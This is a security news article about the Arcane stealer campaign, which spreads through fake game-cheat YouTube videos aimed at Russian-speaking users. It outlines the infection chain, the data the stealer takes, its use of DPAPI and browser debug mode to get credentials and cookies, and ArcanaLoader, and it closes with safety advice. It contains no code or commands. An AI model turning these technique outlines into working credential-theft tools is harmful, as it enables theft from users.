YouTube Game Cheats Spread Arcane Stealer Malware to Russian Users

Cybercriminals have found a clever new way to distribute malware by uploading fake game cheat videos to YouTube, aimed at Russian-speaking users. These videos lead unsuspecting players to download password-protected files that hide a stealthy malware known as Arcane, a powerful stealer designed to collect a wide range of sensitive data.

This new threat highlights how attackers continue to evolve, using popular platforms and interests like gaming to slip past defenses and infect devices silently.

A Dangerous Setup Behind Game Cheat Promises

Malware Hidden in Cheat Downloads

The infection starts with a simple YouTube video promising free cheats or hacks for popular games. In the description, the video includes a download link to a ZIP file protected by a password, making it appear safe or exclusive.

Once downloaded and opened, the archive contains a batch file named start.bat. This file uses PowerShell scripts to pull down more files from remote servers. These files include two hidden programs — one for mining cryptocurrency and another for stealing user data.

The Arcane stealer is the star of this malicious toolkit, replacing an older malware known as VGS, which was previously identified as a Phemedrone variant. Researchers at Kaspersky first discovered Arcane during late 2024.

What Makes Arcane Stand Out

Built with Borrowed Code but Loaded with New Features

Arcane may use elements from other malware families, but it brings new tricks to the table. Its developers added code for collecting vast amounts of data, including personal, financial, system, and account information.

This includes:

• Web browser data: usernames, passwords, cookies, saved cards
• VPN client details: including OpenVPN, NordVPN, Surfshark, ExpressVPN, and others
• Gaming accounts: like Steam, Epic Games, Roblox, Riot, Battle.net, and Minecraft clients
• Messaging platforms: including Discord, Skype, ICQ, Telegram, Signal, Viber, and more
• Crypto wallets: like Zcash, Jaxx, Exodus, Ethereum, Guarda, and Coinomi
• Email clients and FTP tools: such as Outlook, FileZilla, and Cyberduck

What makes Arcane even more dangerous is how it gathers all this information without alerting the user. From screen captures to Wi-Fi passwords and running processes, the stealer silently compiles everything it can find.

Digging Deeper into the Stealer’s Tools

Using Browser Weaknesses to Steal Data

Modern browsers store login details and cookies securely using unique encryption keys. Arcane uses Windows’ Data Protection API (DPAPI) to unlock these keys.

To take it a step further, Arcane drops a small tool called Xaitax, which cracks browser encryption by running in the background. Arcane quietly reads the results from the tool’s console output and gains access to saved credentials.

It also runs the browser itself through a debug mode to grab cookies that are otherwise hidden, giving the attacker full access to session data for email, shopping, or social media accounts.

A Full Profile of the Victim’s Device

Stealthy Monitoring and Device Mapping

Arcane collects more than just account credentials. It creates a full profile of the victim’s system, including:

• Operating system details
• Running applications and background processes
• Screenshots of open windows
• Wi-Fi network names and saved passwords
• Installed software configurations and settings

By gathering this level of detail, the malware can help attackers understand the victim’s behavior, location, and habits — and even decide how to exploit the information further.

The Rise of ArcanaLoader: A Tool for Wider Reach

A Loader That Pretends to Offer Cheats

The malware developers have now expanded their campaign by releasing ArcanaLoader, a small app that claims to download more game cheat tools. In reality, it silently delivers the Arcane malware instead.

This loader is being shared in gaming forums and social media platforms, tricking users who are looking for a competitive edge or free in-game rewards.

Reports suggest that the main targets are users in Russia, Belarus, and Kazakhstan, although others may be affected if they engage with similar cheat-related content.

Why This Method Is So Effective

Familiar Content Makes Users Drop Their Guard

Using YouTube as a launchpad is a smart move for cybercriminals. It is a platform that gamers trust and visit daily. A well-edited video showing cheat demos can seem very convincing, especially when paired with comments praising its success.

Once users are curious enough to download the cheat, the infection process begins. Password-protected archives add a layer of legitimacy, making it feel more exclusive and safer than it actually is.

“This campaign is a clear example of how creative and flexible cybercriminals can be,” said researchers at Kaspersky. “Arcane is dangerous not just because of what it collects, but also because of how well it hides and spreads.”

The Bigger Risk for Gamers and Online Users

Game Cheats Becoming a New Malware Channel

This campaign is not the first time malware has been disguised as game cheats, but the level of detail and scope of Arcane makes it a significant leap forward. It shows that attackers are now targeting specific user groups, such as gamers, with advanced tools.

Cybercriminals know that gamers often turn off antivirus software or lower system defenses to run mods or unofficial programs. This makes them perfect targets for stealer malware, especially when the content is presented as useful or desirable.

How to Stay Safe Online

Smart Habits That Help Avoid Infection

• Never download game cheats from YouTube or unknown forums
• Avoid opening ZIP or RAR files from unverified sources
• Keep antivirus software active, even while gaming
• Use trusted VPNs and update them regularly
• Enable two-factor authentication on important accounts
• Regularly monitor your accounts for unusual activity

Users, especially younger ones, must understand that free cheats and mods can come at a cost. In many cases, that cost includes losing personal data, access to email or gaming accounts, or even having funds stolen from digital wallets.

FAQs

What is Arcane stealer malware?
Arcane is a type of malware that collects a wide variety of personal and system data, often disguised as a game cheat tool.

Where is Arcane malware being spread?
It is primarily shared through YouTube videos that promise free game cheats. Users in Russia, Belarus, and Kazakhstan are the main targets.

What kind of information does Arcane collect?
It collects browser data, VPN details, gaming account information, cryptocurrency wallets, Wi-Fi passwords, system data, and more.

What is ArcanaLoader?
ArcanaLoader is a separate program pretending to install cheats, but instead it installs the Arcane malware onto the victim’s system.

Why are gamers being targeted?
Gamers are likely to lower security settings and download unverified tools, making them easier targets for stealer malware.

How can I protect myself from malware like Arcane?
Avoid downloading cheats from unknown sources, keep your system updated, use antivirus software, and never trust content that seems too good to be true.